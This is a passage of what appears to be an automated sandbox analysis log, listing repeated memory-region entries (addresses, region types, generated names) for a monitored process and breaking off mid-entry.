Region: id = 12831 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12832 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12833 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12834 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12837 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12838 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12839 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12840 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12841 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12842 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12843 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12844 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12845 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12846 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12847 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12848 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12849 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12850 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12851 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12852 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12853 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12854 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12855 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12856 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12857 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12858 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12859 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12863 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12864 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12865 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12866 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12867 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12870 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12872 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12873 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12874 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12875 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12876 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12879 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12880 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12881 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12882 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12883 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12884 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12885 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12887 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12888 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12889 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12892 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12893 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12896 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12897 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12900 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12901 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12904 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12905 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12906 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12909 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12910 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12912 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12913 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12914 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12916 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 12917 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12918 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12919 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12920 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12921 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12922 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12923 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12924 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12925 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12926 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12927 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12928 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12929 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12930 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12931 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12932 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12933 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12934 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12935 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12936 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12937 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12938 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12939 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12940 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12941 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12942 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12943 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12944 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12945 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12946 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12947 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12948 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12949 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12950 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12951 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12972 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12981 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 12982 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 12983 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12984 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12985 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 12986 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12987 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12988 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12993 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12995 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12996 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12997 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12998 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 12999 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13000 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13001 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13002 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13003 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13004 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13005 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13006 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13007 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13008 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13009 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 13019 start_va 